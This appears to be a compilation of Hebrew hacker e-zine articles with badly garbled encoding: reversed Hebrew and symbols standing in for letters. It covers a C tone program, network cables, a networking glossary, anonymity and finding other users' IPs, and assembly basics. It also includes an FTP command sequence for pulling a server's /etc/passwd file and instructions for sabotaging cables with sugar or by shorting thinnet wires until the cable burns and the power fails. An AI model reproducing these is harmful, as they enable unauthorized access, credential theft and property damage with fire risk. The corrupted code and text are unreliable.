!זאו !רתאה לש תואמסיסה %בוק תאצוהו יפ.יט.ףא רתאל הצירפ לע רבסה הפ םכל שי וישכע
.אמסיסה תא #ל שיש עדוי אל אוה יכ ןימדאה לש ותעידי אלל יפ.יט.ףא רתאל תשגל רשפא
.הז םא םישוע םתאש המב ורהזת !קר הטישה הנה יקוא
+ ( סוד טמורפ !סוד ןולח םכל וחתפתו וכל . $os Pro4t .)
9 $אבה ףצרה תא ושיקה .
QtI QtI%serVer!to!hack%co4
3 ( רטנא לע וצחל !םולכ ושיקת לא . ןוכנ !שמתשמ םש שיקהל םירומא התא וישכע . nter .)
: ( רטנא לע וצחל !םולכ ושיקת לא . ןוכנ !אמסיס שיקהל םירומא התא וישכע . nter .)
= $אבה ףצרה תא ושיקה . Ouote user QtI .
J $הז תא וישכע . Ouote cwd }root .
N $הז תא וישכעו . Ouote Iass QtI .)םייתדוקנה ילבו הדוקנה ילב( .
. $ הז תא ושיקה !םירבוחמ םתא וישכע . cd etc .
; היקיתב םתא וישכע . etc $ ושיקה ! get Iasswd .
.דבל םתא םשמו םכלש חישקה ןנוכל תדרל רומא תואמסיסה לש %בוקה זא ןוכנ לכה םתישע םא
!והשמ הז םא תושעל וסנ !יהשלכ #רדב ןפצומ אוה םא
.)הלאכ תונכות רסח אל( הז תא השעתש תונכות ודירות וא ותוא חצפל #יא ילא ובשחת
" הבר הדובעו " הדובע םכל #סח הז זא פצומ אל %בוקה םאו
.םיאצומ םתאש המ םא םיצור םתאש המ ושעת םשמ
.םייתדוקנה ילבו הדוקנה ילב ושיקה !םישיקמ םתאש המ לכ 222
.תוכרעמה לכ לכו םירתאה לכ לע דובעי אל הז """" הבושח הרעה 2222
" ילא תונעטב ואובת לא ! םכל דבוע אל הז םא זא
.םימיוסמ םירתא לע דבוע הזש עדוי תישיא ינא
By Pirs¡i]ng
+;9
תפשב םינו תריצי C
םיניינעה ןכות
-------------
+ םינוט .
9 ינושאר טבמ .
3 ינש טבמ .
: תודוקפ .
= םינוט בוברע .
+ םינוט .
. תמייוסמ תורידתב תיצר רשא !םיוות לש הרדס וא !לילצ םצעב אוה םינוט
... והשמ השוע הז םיוסמ ירוביצ ןופלטב ותוא עימשמ ינאו םיוסמ ןוט
... ו'כו תואספוקל ! ןופלטה קותינל $ םינוט ןומה שי
9 ינושאר טבמ .
3 includerstdio%h 7
3 includerdos%h 7
Void 4ain )(
6
3oundX+.** <)
$ela)X+*** <)
Nosound <)(
5
3 ינש טבמ .
. השוע הז לכ םצעב המ
ןוט הליעפמ הנכותה +.**
... ותוא הקיספמ זאו ! היינשל
3 includerstdio%h 7
3 includerdos%hj /i Qor dela) (0 )(
Void 4ain )(
6
3oundX+.**Yq /i 3ound oQ +.**4h( (0
$ela)X+***Yq /i -or 3ec (0
NosoundXYq /i stoI the sound (0
5
+;3
: תודוקפ .
---------
+ . sound הצור התאש תורידתב לילצה תא ןמסמ 0 ה - <)0(
9 . deal) תוינש ילימב תוכחל הצור התאש ןמזה תא ןמסמ 0 ה - <)0(
3 . nosound לילצה תא קיספמ - <)(
= םינוט בוברע .
--------------
הנכותה תויהל הכירצ הככ זא םינוט בברעל םיצור םתא םא
3 includerstdio%h 7
3 includerdos%h 7
Void 4ain )(
6
3oundX+*** <)
3oundX9** <)
$ela)X+*** <)
Nosound <)(
5
תורידתב דחא םילילצ ינש ליעפמ הנכותה ! הפ הרוקש המ +*** ינשהו !
תורידתב 9*** הכחמ איה זא . +*** הקיספמ זאו ! תחא היינש הזש תוינש ילימ
... לכה הז . םילילצה תא
. ליעומ והשמ הזמ אצי אל לבא ! דחיב םילילצ ןומה בברעל םילוכי םתא
By Boba Smith
םינוקית Razor
+;:
םילבכ
( " םהילע תעדל #ירצ המו שי םיגוס הזיא Pir[s]ing
.תוירקיע תוקולח שולשל םיקלחתמ םילבכה יגוס לכ
• םירוזש םילבכ
• ילאיסקוק לבכ
• יטפוא ביס
( .רוזש גוז לבכ M#P )
$ םיגוס ינש םנשי
.#כוסמ אלו #כוסמ
( #כוסמה #wisted Pair $אוה ) ןיב תוערפה םילטבמו הז ביבס הז םיפפולמ תשוחנ יטוח ינש
.םיטוחה
( #כוסמ אלה Mnshilded#wisted Pair $אוה) טוח םע הז ביבס הז םיפפולמ תשוחנ יטוח ינש
דירפמ
.םיטוחה ןיב תוערפה םילטבמו םהיניב
יתב המכבש חוטב ינאו תידרשמ הדובעל רתויב םיצופנה םילבכה םה לבא בר לדבה םהיניב ןיא
.לנה םילבכב םישמתשמ רפס
-ה ילבכ M#P / #P ( ריקב עקתל תשרה סיטרכמ םיאצוי Re:= ההז לבכ #רד םירבעומ רשא )
.תזכרל
ה לש םוכיס תלבט #P / M#P .
' יברימ #רוא +**M X39. Qeet )
' תוריהמ +*MbIs םג תויהל לוכי לבא כדב +**
.הלקו רתויב הטושפ ' הקוזחת(הנקתה
.דחוימב שיגר ' תוערפה
. רתויב לוזה ' תולע
.םילופכ קר םילבכ לש תואסרג םתוא ןכ ומכ םתנשי
Mnshielded $ouble #wisted Pair% / shielded $ouble #wisted Pair .
שי לופכה לכבש אוה םהיניב לדבהה 9 .תוצובק יתשל םיפפולמ רשא םיטוח עברא
תשוחנ יוש.לבכה יעוציב תא תרפשמו רתוי תוחפ זוחאל תוערפהה זוחא תא הדירומ איה #כב
.קיטסלפב תפטעמל םיטוחה ןיב הגורא טוחה ןיב הגורא
ה לש םוכיס תלבט 3#P / 3M#P .
' יברימ #רוא +**M X39. Qeet )
' תוריהמ +==MbIs
.ליגרהמ שימג תוחפ .םידחוימ םירבחמ #ירצ לבא הלק ' הקוזחת(הנקתה
.תוערפה ינפב דימע ' תוערפה
-המ רקי ' תולע #P .םירחאה תמועל לוז #א
+;=
' ילאיסקוק לבכ
.)םותכ(דודיב תבכש יע םידרפומ רשא םילבכ ינשמ בכרומ
.םידרפומ תשוחנ יביס רפסמ כדב איה תיזכרמה הבילה
.)לוחכ(םידרפומ תשוחנ יביסמ ןכ ומכ יושע הבילה לע הרימשל קיטסלפ תפטעמ
.הנומתב םותכ עבצ ' תיזכרמה הבילה יע םירבעומ םינותנה
.לנה לבכה לש םיגוס ינש םנשי
#hinNet F &onnected to the Ilug XעקשY with RG=. connectors%
#hickNet ! &onnected to the Ilug XעקשY with RG., RG++ connectors%
.#וכיס יע לבכב לוביחו תוערפה ענומו קראומ אוה ינוציחה #ילומה םילבכה לכב
' םוכיס תלבט thinnet / #hickNet .)לאיסקוק(
#hickNet #hinNet
$ יברימ #רוא =** $ יברימ #רוא +.=
$ תוריהמ +*4bIs $ תוריהמ +*4bIs
השק $הנקתה הלק $הנקתה
דואמ #ומנ $תוערפה דואמ #ומנ $תוערפה
ההובג $תולע #ומנ $תולע
+;J
GTEU
Rg=., Rg.
R@C \CS
STR c@_R^
`E?@U RGEU
d?bD_] DT R@CG \CS
' יטפוא ביס לבכ -iber 6Itic .
.םייקש רתויב בוטה תשרה רוביח
.ילמשח תואכ אלו רוא #רדב םירבעומ םינותנה
.רודישה וקב תועיגפו תוערפה ללוחמ וניאו תוערפהל שיגר וניא לבכה
.םירחא םילבכ תמועל עדימ לש הרידא תומכ ריבעהל םילגוסמ םה
.לבכל עירפהלו טטצל רשפא יתלב
$הארמ ןמ ומכ איה הנפד לכ רשאכ לבכב םירבוע םינותנה #כ
' מ יונב לבכה ,nIut ' ו 6utPut .
-ה רשאכ 6M#PM# ' כ רוא תובוגת חלוש 94h( .
-הו ,NPM# ' כ רוא תובוגת חלוש +94h( .
$יטפואה לבכל םוכיס תלבט
' יברימ #רוא 9***M
' תוריהמ +**!9***MbIs
השק ' הקוזחת(הנקתה
.ויהי אלו ויה אל ! ןיא ' תוערפה
' דחוימב רקי ' תולע N תנשל ןוכנ( רטמל רלוד 9*** .)
$ תיללכ םוכיס תלבט
תולע תוערפה הנקתה
MBP3
#רוא לבכ גוס
#ומנ הובג הלק
+*!+** +** #P/M#P
#ומנ הובג הלק
+J!+== +** 3#P/3M#P
#ומנ #ומנ הלק
+* +.= #hinNet
הובג דואמ #ומנ השק
+* =** #hickNet
דחוימב הובג ןיא דואמ השק
+**!9*** +*** 6Itic
By Pirs¡I]ng
+;N
םילבכ לש םינוש םיגוס סורהל ךיא
בותכא ינא טושפ םינש חקי הז יכ המ השוע המ טרפא אל ינא $לנה םילבכה תא סורהל םיכרד
.לבק הזיאלו #יא !תושעל המ
#P / M#P / 3#P / 3M#P .רכוסב ותוא םיסכמו םסיק םיחקול םתא '
הסוכמ םסיקה תא םתעקת ובש םוקמהש וגאדת .ולש עצמאב #רעב !לבכה #ותב ותוא םיעקות
ל הככ לבכה תא וריאשת .שמשל יולג !שמשל בורק אוה רכוסה 99 .רומג אוהו תועש
#hinNet / #hickNet .םינפב שי המ וארת .ותוא םיחתופו לבכה תא םיחקול םתא '
םש ואצמת םתא עדוי ינאש המ יפל : .םיניינעמ אל ראשה לכו םימודא םיטוח
םא םיפושחה תווצקה לכ תא ורבח וישכע .םתוא ושפחו וללה םימודאה העבראהה תא וחק
' כ רחאל .)םלש םויל םתוא קיזחיש רחא קבד ריינ לכ וא( פייטולצ +: רצק היהי #רעב תועש
.למשח תקספה היהתו !תשר סיטרכה םג !ףרשי לבכה
By Pirs¡I]ng
+;.
םיגשומ
"d4in )תשר להנמ( רוטסנימדא -
$N3 ! d4ain na4e serVer והלשכ תרש יע ןתינש ןיימוד לש םש -
,36 ! 6rgani(ation Qor ,nternational 3tandards / ,nternational 3tandardi(ation
6rgani(ation
#&P/,P .טנרטניאה תשרל סיסבה תא הווהמו םלועב רתויב %ופנה תרושקתה לוקוטורפ -
ותוא תגציימה יפ.יא תבותכ שי תשרל רבוחמה בשחמ לכלש ןורקעה לע ססובמ
.בשחמל בשחממ עדימ ריבעהל ןתינ הז רפסמל האירק ידי לעו
הרטמו אצומ תיוות דצמומ אקטפ לכל .אקטפה איה וז תינותנ תרבעה תטישב סיסבה
יפ.יא(יפ.יס.יטה לוקוטורפ תומצעב רבעומ טקאפה .חלשהל ןאל טקאפל תורמואה
7"N .תימוקמ תשר -
8"N .חווטב רתוי הלודג קר תימוקמ תשר ומכ -
888 ! 8orld 8ide 8eb .טנרטניאה תשר -
PPP .טנרטניאל רוביח תעב שומישב %ופנ .םדומ #רד םיבשחמ רוביחל שמשמה לוקוטורפ -
P"P .שמתשמה יוהיזו אמסיס תומיאל לוקוטורפ -
ReIeater ! 8orks under Ph)sical 7a)er on the 63, קחרמ תולבגמ לע רבגתמ !רזחשמ .
.קוחרה דצהמ עיגה רשא תואה תא רזחשמו
Bridge םהילא תונפל רשפא יאו תובותכ ןיא םירשגל !תשרב םינוש םיתמצ רוביחל ששמ !רשג -
.םיוסמ #רוצל
Router .ןאלו רדשל ביתנ הזיאמ טילחמו דעיה תובותכ תא ןחוב !בתנ -
R,P ! Routing ,nQor4ation Protocol הקידב תרזעב הריחבמ האצותכ רודיש ביתנ תריחב -
.םיילמינימ תרושקת יוק רפסמ תקדוב רשא
3P- ! 3hortest Path -irst םיטירפה ןובשחב םיחקלנ תאז הריחב תטישב פירה לש רופיש -
.הרובעת תוריהמו סמוע !וקה ריחמ $ םיאבה
Gate8a) #רד הזיאב הנשמ אל עדימה אצוי םשמ ! רטוארה לש טלפה תדיחי !רושיג רעש -
" אצוי אוה םשמ .רודיש
P,NG הבוגתה ןמז תא קדוב #כו הבושת ריזחהל בשחמל רמואש םייוסמ בשחמל טקאפ חלוש -
לש
.םיבשחמה ייתש ןיב רוביחה תוריהמ תא האורו בשחמה
-#P ! -ile #ransIort Protocol .תשרב םינוש םיבשחמ ןיב םיצבק תרבעה רשפאמ הז םושיי -
4ail תשר יבחר לכב ינורטקלא ראוד תחילש רשפאמ רשא ינורטקלאה ראודה םושיי -
.טנרטניאה
H##P ( .טנרטניאב םיגצומ רשא טסקט רפיה יפדל ןקת - H#M7 )
#7N# .תשרב קחורמ בשחמ לא ףוסמכ רוביח רשפאמה םושיי -
,R& .תמא ןמזב תשרב םישנא ןיב החיש רשפאמ רשא לוקוטורפ -
Packet םיטקאפל קרופמ תשרב םרוזה עדימ .ףצרב תשרב תרדושמה הרצק םינותנ תצובק -
לע )תוליבח !תונמ( םינטק
.םיבשחמ ןיב עדימ ריבעמ םצעב טקאפ .תואיגש תרקב לע לקהל תנמ
BaseBand וא תוכרעמ יתש ןיב רשקמ רשא יסיפ תרושקת ספ םייק תאזה הטישב !סיסב ספ -
.רתוי
Broad&ast םהשלכ תותוא וא תוא לש רודיש -
Hub בשחמ רבחל ןתינ םפירוביחהמ דחא לכל .םיבר תשר יירוביח ליכמה ינורטקלא רישכמ -
.תשר ילבכ תרזעב
םיבשחמל םתוא ריבעמו תשרב םירוחבמש םיבשחמהמ עדימ לש תותוא לבקמ רישכמה
דעי תבותכל וא םירחאה
.עדימה תשקב יפל תרחא
Mode4 תרדגהו ןופלט וק יע טנרטניאל רבחתהל #ל תרשפאמ רשא הרמוח !םדומ -
.םינוכנ םילוקוטורפ
IItI n Point ! to ! Point ! #unneling Protocol לועית לוקוטורפ לש תיללכ הריקס קפסמ -
.הדוקנל הדוקנ
+;;
Back$oor בשחמ לע והשמל השיג )כדב( ומצעל רשפאל ידכ ןווכמב סינכה והשימש דוק תורוש -
..תולקב רתוי רחא
תועובק תודוקפ םש בותכל ול ןתיו םייוסמ יפ יאל קר םייוסמ טרופ חתפיש דוק אמגודל
ועצביש
.עבק רודקאבה ןיכמש המ יפל יהשלכ הלועפ
ידכ םיפסונ המכ םיניכמו הז תא םילצנמ רודקאבה תא ואצמ רשא םירקאה םימעפל
" רתוי הטושפ היהת תכרעמל האבה הצירפהש
'Iloit .. תוכרעמב החטבא ירוח לצנל םיכרד)םידוק - החטבא ירוח לש לוצינ -
7inuK םניחב שומישלו הדרוהל תנתינו חותפ דוק תלעב ! סקינוי לע תססובמה הלעפה תכרעמ. -
-ire8all תרבוחמש תימוקמ תשר וא ימוקמ בשחמל תשרומ אל השיג ינפמ הנגהל תכרעמ -
.טנרטניאל
Pro') ויתוחוקל ןעמל )'וכו תולודג תורבח !טנרטניא תורבח( תוריש יקפס ידי לע םקומה תרש -
רוציל ודיקפתו
רוביח יסקורפה תרשל .םישלוגה תשקב יפ לע עדימ םהמ ףולשלו תשרב םיבשחמ םע רשק
רתוי הברה ריהמ
.ונממ םיצבק תלבקל הברהב ריהמ םוקמכ שמשמ ןכלו םדומה םע עוצממה שלוגה לשמ
#סוח #כבו !יסקורפה תרשב רמשנ %בוקה - %בוק ותוא תא םישקבמ םישנא הברה םא
הנתמהה תא םישלוגל
םילוכי םה ןכלו הנגה םג שי יסקורפ יתרש לע .קחורמה טנרטניאה תרשמ עדימה תלבקל
לוורייפכ שמשל
.רב לבא
Protocol ולכויו וניביש םלועה לכב תוכרעמ ןנכתל תורשפאמו תומכסומ תוארוה)תודוקפ רדס -
.הינשה םע תחא רשקתל
Binar) - מ תבכרומה הפש - * ! + .התוא קר !התוא ןיבמ בשחמהו
3ocket XHardware #רוצ אלל וררחשלו ינורטקלא ביכר עוקתל רשפא וכותל רשא ןקתה - )
.המחלהב
3ocket X3oQtware !טקוס #רד רשק רוציל הילע רחא בשחמ םע רשקתל לכות הנכותש יידכ - )
תעצבמ הנכותה
ןיב רוביח תרצויו רחא בשחמ לע תרשכ חותפש טקוס #ותל טקוס לש החיתפ
םיבשחמה
.םהניב םיטקאפ הריבעמו
&o4Iiler . יראניב !בשחמ תפשל הז תא #פוהו יהשלכ תונכת הפשב תבתכש המב יוניש ללוחמ -
By Pirs¡I]ng & Rul3r .
9**
םירחא םישנא לע םירבד תולגל ךיאו ימינונא תויהל ןיא ' תוימינונא
%בוק םידירומ םתאש םעפ לכ םיימינונא אל שממ שממ שממ םכלוכ שיגדמ ינא לבא םכלוכ בוט
$ םכילע תעדל )םיצור םה םא( םילוכי רתאה ישנא זא רתאמ
,P
,3P
%רא
ריע
ןפדפדה גוס
63
#סמ תייצולוזר
ה MR7 וב םתרקיבש םדוקה
...ילש #סמה תייצולוזר המ עדי רתאהש תפכיא ימל המ זא ונ $ םירמוא חטב םתא וישכע
אשונב אצמתמ תצקש םדאל זא הז תא תושעל לוכי ןברוחמ רתא םא יכ לודגבו םיעוט םתא זא
$ אמגוד דוע הנה םירבד םכילע תולגל היעב אל הז זא
םירבדה תא ריתסמ אל אוה בוטה הרקמב( םירבד הברה והשימ לע תולגל ןכ םג רשפא סרימב
)הלאה
יתימא םש
תבותכ
ליימ יא
,P
,3P
%רא
ריע
....הלאכ םירבדו תשר יקחשמב םג רבד ותוא
ה לש ליימ יא םכל שי םא דיגנ
,3P
$םתנבה אל םא אמגוד הנה םכלש
4ukik(ahaV%net%il

ל סנכהל םילוכי םתא זא
(ahaV%net%il
טרופ
N;

טרופ הזש
-,NGR
םימעפל רבחתה אוהש הנורחא םעפ יתימא םש ומכ ונלש יקומ לע אלמ תולגל םילוכי םתא םשו
רחא ליימ יא ול שי םא ןופלט רפסמ
דואמ רבסה יל ןתנ אוהו ימוקמ הזש יל רמא סקטרוו יללכ וא ימוקמ הז םא עדוי אל ינא וישכע
...דבל וטילחת רבסה יל ונתנ אלו יללכ הזש יל ורמא דחא הזיא דועו קנאפ רבייסו ענכשמ דואמ
'צאקה הפיא
חילצהל יוכיס רתוי םכל שי זא םימוקמ תמאב הז םא לבא הז תא ומסחש םירברס אלמ שי הנה
רתוי שי יכ אוצמל
)יוכיס רתוי םירברס רתוי(
שי לבא רבוחמ אל ונעי אוהו ויק יס ייאב והשימ םע רבדל םיצור םתא םא ןבצעמ ארונ הז ןוכנ
הברה לבא הלגמש הנכות שי ןוכנ הלואגה תא איבמ ינא זא םכממ םלעתמ אוהש השגרה םכל
ולש ליימ יאה תא םיעדוי םתא םא )ליימ יא אורקל וליפא( תינדי םירבד תושעל ףיכ רתוי הברה
אל וא טנרטניאב אוה םא וארתו םדוקמ וילע יתרבידש רגניפל וסנכת זא
9*+
ימינונא ליימ
זאו ליימה לע ינמי ןצחל וצחלת םא זא ליימ יא םילבקמ םתאש םעפ לכ IroIarties ולבקת זא
ה תא ,P ה תא וארי טנלט םע ףייוזמ ליימ יא וחלשת םא וליפא חלושה לש ,P תחא תאז( םכלש
)ףייוזמ ליימ יא תולגל םיכרדה
.הז תא םיפקוע #יא $הלאש
שי זא re4ailer דיגנ ל םיחלוש םא קניל ומכ הזש 4ukikre4ailer%co4 תיטמוטוא הז זא
ל ראודה תא ריבעמ 4ukik(ahaV%net%il
יתוריש שי זא ראוד חולשל םיצור םתאשכ הרוק המ לבא הפיו בוט הז re4ailer יסקורפ ומכ הזש
ה תא םיאור החילשה ירחא ,P ה לש re4ailer םכלש תא אלו
יתורישב םישמתשמ #יא $הלאש re4ailer .ימינונא ראוד תחילשל
טרופ תרשל טנלט םע םיסנכנ םתא זא 9= )םניח םושיר( אמסיסהו שמתשמ םשה תא םיסינכמ
סרימב יתיא ורבדת םומיסקמ תושעל המ םיניבמ קוידב אל םתא םא םיחלוש םתא םשמ זאו
וארקי אל םירחאש הז לש הרטמה תוימינונא לש רחא גוס הז לבא ימינונא ליימ יאל הטיש דוע
הטישה הנה זא #תוא ולגי אלש אלו
PGP
ל וסנכת הז המ םיעדוי אל םתא םא www%whatis%co4 םינייוצמ םירבסה םש שי( םש ושפחתו
)רבד לכל טעמכ
ראודה לע דוע
.אל וא ףייוזמ יתלביקש ראודה םא הלגמ ינא #יא $הלאש
ה תא שי לכ םדוק header בתכמה לע ינמי ןצחל םיצחול וילא סנכהל ידכ IroIerties ב םש
details
ה םצעב הז header הלעמ רבכ הז זא )הרצק ייד הרוש לכ לבא תורוש רשע( רצק אוה םא וישכע
ב ולכתסת תא וישכע דשח header לש יפ ייאה ומכ תונינעמ ייד תויצמרופנא םש שיש וארת
תרשה הז זא ףייוזמ תמאב הז םא ןייוצמש ראודה תרש וא חלשנ ונממש ראודה תרש חלושה
םיגולב לכתסהל הלוכי הרבחה זא בושח והשמ לע יניצר ףויז םא זא ופייז ונממו וילא ורבחתהש
ב בותכ רבכ אוה( םכלש יפ ייאה יפל תוארלו תרשה לש header רוזחנ זא םתישע המ קוידב המ )
שי יתימא ליימ יאב זא !ףייוזמ הז םא םילגמ #יא וניניינעל 3#MP ,$ ףייוזמ חוטב הז ןיא םא
אוה זא יפ ייא םיסינכמ םאש הנכות שי רבד דוע ףייוזמ זוחא האמ אל ןיידע הז שי םא םג לבא
הזיא #ל רמוא ,3P םתאו הילגנאמ ליימ םתלביק יכ רזוע שממ הז זא הז תא ושעת םא הז
ה תא וסינכת הנכותל וסנכת ףייוזמ הזש םידשוח ,P אל הז זא בהז טנרטניא דיגנ הזש בותכ םאו
...הילגנא
םיקנילה לש עטקב טסקטה ףוסב איה תאזה הנכותה לש רתאה
&oockies
תא גישמ והשימ םאש והז זא םכממ הצור ינא לזאזעל המ זא הז המ םיעדוי רבכ םתאש חינמ ינא
יקוקה לש הנפצהה תא חנעפל שי לבא ןטק יוכיס ול שי זא גישהל השק יכה אל םכלש זיקוקה
ןברוחמ רתא הז םא דחוימב
שומיש ידי לע קר םיבשוח םתאש הממ רתוי הברה םכילע תולגל םילוכי םירתא והשמ דועו
זיקוקב
םידיאונרפ ידימ רתוי תויהל #ירצ אל לבא םתוא קוחמל יאדכ $הנקסמ
9*9
םכילע םיטרפ םיליכמש םיצבק
דראהה תא ופרשתש יאדכ םכילע םיטרפ םיליכמש םיצבקה לכ תא קוחמל םיצור םתא םא בוט
קוחמל םילוכי םתאש םירבד הנה לבא קסיד
בו זיקוקה לש הייקיתב( זיקוק te4Iorar) internet Qiles )זיקוק אלמ םש םג שי
-,7***+%chk
-,7***+%chk
יס ןנוכב םיאצמנ ללכ #רדב
M,R&
םאאאאאתס )$ ...רמוא אל ינאו שיש וא תושעל המ הברה #כ לכ ןיא
האבה הדוקפה ידי לע יפ ייאה תא ריתסהל םימייוסמ םיתרשב רשפא
( 4ode )ournick s'
דבוע הז םיתרשה לכב אל
...תעדל םיצור תמאב ונלוכש המ הז סרימב יפ ייא םילגמ #יא לבא הפיו בוט $הלאש
תושעל רשפא זא
$&& chat
תושעל זאו netstat
ןייוצמ דבוע יל ונימאת
וא
( dns
בוט רתוי הברה תמדוקש הטישה הז ללגב )םבור( הז תא םימסוחש םיטרש שי
תא םש סינכהל טושפ שממ סרימ לש תויורשפאב וקדבת יסקורפ סינכהל סרימב םג רשפא
םיטרפה
,&g
$םיאבה םירבדה תא ושעת םכלש יפ ייאה תא ריתסהל ידכ
ל וסנכ PreQerences ל ןכל םש connections תא ונמסת םש ,o4 using a Ier4anent internet
conection X7"N )
תא ונמסת םש , a4 behind a Qire!wall תא ונמסת , a4 using a sock : Iro') וצחלת ne't
לע םכתוא לאשי אוה הז ירחא יסקורפה לש יפ ייאה תא ונתת יפ ייא שקבי אוה הז ירחא sock
Iort : םש ובתכת :*** תא ונמסת הז ירחא oIen an outgoing MP$ Iort :*** on 4) Qire!
wall וצחלת ne't העדוהה עיפות הז ירחא check 4) Qire!wall/Iro') conection דואמ בושח
ה תשרל אל לבא טנרטניאל רבוחמ תויהל ,&g דואמ בושח הז
והז
תורדגהב ליגר םדומ בצמל ורזחת טושפ בצמה תא ריזחהל ידכ
םיקניל
httIh//www%IgIi%co4 םכלש םיליימ יאה תנפצהו הנפצה לע
httIh//www%c)berar4)%co4/lists םיבוט םיימינונא זיסקורפ לש המישר
httIh//www%4ultiIro')%org/anonPlist%ht4 הדות( םיניוווווצמ זיסקורפ לש המישר
)סקאטניסל
www%neotracer%co4 יפ סא ייא תרתאמש הנכותה -
By NDR113
9*3
רלבמסא
.הז המלו הז המ ריבסי ינא זא םייחב םיימעפ וא םעפ הזה םשה תא םתעמש חוטב . ללכב רלבמסא הז המ
. הבתכב המ
• רלבמסא לע רצק רבסה
• הריפס יסיסב
• ילמיצדל יראניבמ הרמה
• םירגוא
• תודוקפ
.רבסה
רשא םיטיב לש תוליבחל םתוא תכפוהו תוטושפ בשחמ תודוקפ תחקול רשא תונכת תפש איה רלבמסא
.תינכות רותב הב םתבתכש תודוקפה תא םיצירמו םירגוא תחת םידבוע
.קיסייב לאו'זיו וא יס ומכ תילע הפש אל איה !ףס תפש איה רלבמסא
$איה הנווכה 0( & הל םירמוא םתא .תינויגה תונכת תפש איה המגודל
IrintQ
תיראניב הפש ירחא( הנוכמ תפשל בורק יכה רבדה הז רלבמסא התמועל .#סמה לע והשמ הסיפדמ איהו
וכרטצת אלא !השוע אוה המ דימ וניבת אל ילבמסא לש דוק לע ולכתסת םא .וב תנכתל רשפאש )ןבומכ
םישועשכ המלו תינסחמל םיפחוד קוידב המ ןיבהל תוסנלו לכתסהל !בושחל !בוקעל
Iush lea'
(0 .ידאלב .המגודל
$טושפ והשממ ונלש הדימלה לכ תא ליחתנ
.הריפס יסיסב
סיסב( ילמיצדסקה +J ) סיסב( ילמיצד +* ) סיסב( ילאטקוא . ) סיסב( יראניב 9 )
* * * ****
+ + + ***+
9 9 9 **+*
3 3 3 **++
: : : *+**
= = = *+*+
J J J *++*
N N N *+++
. .
-------------------
+***
; ;
-------------------
+**+
" +*
-------------------
+*+*
B ++
-------------------
+*++
& +9
-------------------
++**
$ +3
-------------------
++*+
+:
-------------------
+++*
- +=
-------------------
++++
""" רוכזל יאדכש םירבד המכ
+ . !םירפסמ ינשב קר ןייפאתמ יראניב סיסב * .דחאו
9 . תב בשחמ תלימל תיראניב הלימ םיכירצ התא לשמל !ליבומ ספא ארקנש רבד שי יראניב םירפסמב N
אוה םכלש יראניבה רפסמ לבא תויתוא J בשחמהו לאמשמ ספא ףיסוהל םילוכי םתא זא תויתוא
ל ומכ וילא סחייתמ * תינכותה תא %ירי אל בשחמהו רחא רפסמ היהי הז !ינש דצמ ופיסות םא וליאו
$אמגוד .הנוכנה
J ' תויתוא ++*+*+* ! N ' תויתוא *++*+*+* .יתפסוהש םודאה ספאל בל ומיש !
3 !אמגוד !דחא תוחפ סיסבה לש רפסמל דע הלועה םירפסמה תרדס תא #ישמי יראניבל טרפ סיסב לכ .
סיסב += רפסמ היהי *!+: סיסב . ;; םירפסמ היהי *!;. .
: רפסמ רימהל םיכירצ םתא םא !רפסמ רימהל םכל רוזעת הלעמלש הלבטה . += רפסמל ילטקואב
. םישוע המ זא ילמיצדב
9*:
תא םיחקול + הזש ***+ תא םיחקולו = הזש *+*+ םתלביק !םירבחמו ***+*+*+* הרמה םישוע וישכעו
.)ילמיצד( ינורשעל יראניבמ #ופהל #יא רבסהה הנהו .)ילמיצד( ליגר רפסמל
$ילמיצדל יראניבמ הרמה
.ינורשעל יראניבמ #פוה ינא #יא
$אמגודו רבסה
רפסמה תא חקינ **++**++ רפסמה תא למסמ אוה ריהמ בושיחב ! =+ .
.הז תא יתישע #יא יקוא
.םיבשחמב ' יראניבה לש הלבטה איה הנה
+9. J: 39 +J . : 9 +
.תחתמ יראניבה תא סינכנ
* * + + * * + +
תיתימאה הרפסל תחתמ שי םא וישכע * בותכש המכ הווש אוה זא דחא שי םא לבא ספא הווש רפסמה זא
ה לעמ + .
$לשמל
םירכוז זא דחאה לעמ דחא שי + ה לעמ דחא שי ! 9 דוע םירכוז ! 9 !
$ל םיעיגמש דע 'וכו +s9s+Js39 & =+ .
$םייתש וא םיליגרת הפ םכל ןתא ינא . רורב
++**++** . &
******+* . &
תאצל רומא ןושארב 9*: .
תאצל רומא ינשב 9 .
.השק שממ אל הז יכ בוש וארקת אל םא םתנבהש הווקמ ינא
.לק לש הרדגהל סנכנ ןיידע לבא #בוסמ רתוי תצק הז .יראניבל ינורשעמ םיכפוה #יא וישכע
רפסמה תא לקינ +:3 . םישוע המ זאו
+9. J: 39 +J . : 9 +
!ןימיל לאמשמ !ליחתנ אוב הללאי
םאה +:3 לש הביתב סנכנ +9. מ לודג אוה םא ! +9. .דחא םש םושרנ זא !ןכש רמוא הז
ונל ראשנ וישכע += ( +:3!+9. .)
!#ישמנ += ב סנכנ J: םאה !ספא םש בותכנ .אל ! += ב סנכנ 39 .ספא םש ריאשנ !אל םג !
+= ' ב סנכנ אל +J םש םג בותכנ זא ! * .
+= ב סנכנ . ונל ראשנו דחא םש בותכנ זא ןכ ! N ( +=!. . )
N ב סנכנ : ונל ראשנו דחא בותכנ ןכ ! 3 ( N!: )
3 ( דחא ונל ראשנו דחא םש בותכנ ןכ !םייתש ב סנכנ 3!9 .)
בותכנ םש םג זא ףוסב דחאל לוב םיאתמ אוהו דחא ראשנ וישכעו + .
. ונל אצי יראניב הזיא
+***++++
9הז לע ורזחת זא !אל םא !םתנבהש הווקמ
+9. J: 39 +J . : 9 +
+ * * * + + + +
.)הלקה #רדה הזש( ןובשחמ ילבו ריינ ףד ילב הז תא ושעתש דע הז תא ולגרתת וישכע זא יקוא
סיסבמ רפסמ #ופהל םיכירצ םא !םילק םייח םכל השעתש הטיש הנה 00 K סיסבל )יראניבמ %וח סיסב לכ(
יל ונימאת !ינורשעל יראניבמ זאו הלעמלש הלבטה יפל יראניבל הרמה םישוע םדוק זא )ינורשע( ילמיצד
.לק יכה
.םירגוא לע תצק רבדל ליחתהל ןיינועמ יתייה 9וישכע
$םירגוא
םנשי !דבעמה #ותב ןורכיז יאת םצעב םה םירגוא : רלבמסאב םיתנכתמ כדבש םייללכ םירגוא
!םהו םהב םישמתשמ "', B', &', $' רגוא דוע ונשיו ,P וילא רוזחנ !עגרכ ותוא #ירצ אל לבא
.דיתעב
לש רגוא אוה רגוא לכ +J קלח לכ !םיקלח ינשל וקלחל ןתינש !תויביס . .תויביס
9*=
$ רגוא לכ לש יטקרפה שורפה המ וישכע
"' F accu4ulator
B' F base
Cx - count
$' F data
,P F instruction Iointer
9רגוא לכ לש ודיקפת המ ןייצל תחכש !יריקי גניסריפ 0(
